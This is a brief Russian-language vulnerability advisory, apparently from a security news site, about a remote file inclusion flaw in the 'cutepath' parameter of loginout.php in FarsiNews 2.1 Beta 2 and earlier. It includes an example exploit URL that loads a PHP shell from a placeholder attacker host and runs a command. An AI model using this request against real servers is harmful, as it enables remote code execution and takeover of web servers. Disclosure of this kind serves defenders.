Программа: FarsiNews 2.1 Beta 2 и более ранние версии.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cutepath"
в сценарии "loginout.php". Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольный PHP-код на целевой системе с
привилегиями Web сервера. Для успешной эксплуатации уязвимости опция "register_globals"
должна быть включена.

Пример:

http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии